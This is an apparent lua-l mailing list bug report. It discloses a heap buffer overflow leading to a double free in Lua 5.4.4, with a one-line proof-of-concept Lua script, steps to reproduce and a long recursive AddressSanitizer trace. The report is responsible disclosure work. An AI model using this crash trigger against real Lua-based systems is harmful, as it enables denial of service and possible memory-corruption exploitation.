 |
lua-l archive |
|
|
||
|
Hello, I found a heap buffer overflow which can cause a heap double free error. Lua version: Lua 5.4.4 Copyright (C) 1994-2022 Lua.org, PUC-Rio Latest commit: 8426d9b4d4df1da3c5b2d759e509ae1c50a86667 Platform: Ubuntu-20.04 x86_64 Glibc version: GLIBC 2.31-0ubuntu9.9 POC: --------------- #poc.lua print( xpcall((0), function(...) local f if d[print(print(print(print(t[...]))))] then end end ) ) --------------- How to reprocude: --------------- 1. git clone https://github.com/lua/lua 2. cd lua && make 3. ./lua ./poc.lua --------------- Error message: --------------- double free or corruption (!prev) [1] 49704 abort (core dumped) ./lua ./poc.lua --------------- Address Sanitizer log: see **attachment.txt** I apologise for putting the asan's logs directly into the body of the email in the previous mail which made the body too large to view, I have now put it into an attachment file And the stack backtrace is recursive, so this could be an error that occurs during some recursive processes. Found by: Jinwei Dong |
=================================================================
==49759==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000a450 at pc 0x55555557e6c6 bp 0x7ffffff42760 sp 0x7ffffff42750
WRITE of size 8 at 0x62e00000a450 thread T0
#0 0x55555557e6c5 in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:810
#1 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#2 0x5555555a618e in luaE_checkcstack /home/eqqie/work/lua-5.4.4/src/lstate.c:167
#3 0x55555558357a in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:606
#4 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#5 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#6 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#7 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#8 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#9 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#10 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#11 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#12 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#13 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#14 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#15 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#16 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#17 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#18 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#19 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#20 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#21 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#22 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#23 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#24 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#25 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#26 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#27 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#28 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#29 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#30 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#31 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#32 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#33 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#34 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#35 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#36 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#37 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#38 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#39 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#40 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#41 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#42 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#43 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#44 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#45 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#46 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#47 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#48 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#49 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#50 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#51 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#52 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#53 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#54 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#55 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#56 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#57 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#58 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#59 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#60 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#61 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#62 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#63 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#64 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#65 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#66 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#67 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#68 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#69 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#70 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#71 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#72 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#73 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#74 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#75 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#76 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#77 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#78 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#79 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#80 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#81 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#82 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#83 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#84 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#85 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#86 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#87 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#88 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#89 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#90 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#91 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#92 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#93 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#94 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#95 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#96 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#97 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#98 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#99 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#100 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#101 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#102 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#103 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#104 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#105 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#106 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#107 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#108 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#109 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#110 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#111 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#112 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#113 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#114 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#115 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#116 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#117 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#118 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#119 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#120 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#121 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#122 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#123 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#124 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#125 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#126 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#127 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#128 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#129 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#130 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#131 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#132 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#133 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#134 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#135 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#136 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#137 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#138 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#139 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#140 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#141 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#142 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#143 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#144 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#145 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#146 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#147 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#148 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#149 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#150 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#151 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#152 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#153 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#154 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#155 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#156 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#157 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#158 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#159 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#160 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#161 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#162 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#163 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#164 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#165 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#166 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#167 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#168 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#169 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#170 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#171 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#172 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#173 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#174 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#175 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#176 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#177 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#178 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#179 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#180 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#181 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#182 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#183 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#184 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#185 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#186 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#187 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#188 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#189 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#190 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#191 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#192 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#193 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#194 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#195 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#196 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#197 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#198 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#199 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#200 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#201 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#202 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#203 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#204 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#205 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#206 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#207 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#208 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#209 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#210 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#211 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#212 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#213 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#214 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#215 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#216 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#217 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#218 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#219 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#220 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#221 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#222 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#223 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#224 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#225 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#226 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#227 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#228 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#229 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#230 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#231 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#232 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#233 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#234 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#235 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#236 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#237 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#238 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#239 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#240 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#241 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#242 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#243 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#244 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#245 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#246 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#247 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#248 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#249 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#250 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
0x62e00000a450 is located 0 bytes to the right of 41040-byte region [0x62e000000400,0x62e00000a450)
allocated by thread T0 here:
#0 0x7ffff7681c3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163
#1 0x5555555d43c5 in l_alloc /home/eqqie/work/lua-5.4.4/src/lauxlib.c:1018
#2 0x55555559347b in luaM_realloc_ /home/eqqie/work/lua-5.4.4/src/lmem.c:166
#3 0x555555580249 in luaD_reallocstack /home/eqqie/work/lua-5.4.4/src/ldo.c:194
#4 0x5555555805a8 in luaD_growstack /home/eqqie/work/lua-5.4.4/src/ldo.c:238
#5 0x555555583353 in luaD_precall /home/eqqie/work/lua-5.4.4/src/ldo.c:580
#6 0x555555583590 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:607
#7 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#8 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#9 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#10 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#11 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#12 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#13 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#14 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#15 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#16 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#17 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#18 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#19 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#20 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#21 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#22 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#23 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#24 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#25 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#26 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#27 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#28 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#29 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/eqqie/work/lua-5.4.4/src/ldebug.c:810 in luaG_errormsg
Shadow bytes around the buggy address:
0x0c5c7fff9430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5c7fff9440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5c7fff9450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5c7fff9460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5c7fff9470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c5c7fff9480: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
0x0c5c7fff9490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5c7fff94a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5c7fff94b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5c7fff94c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5c7fff94d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
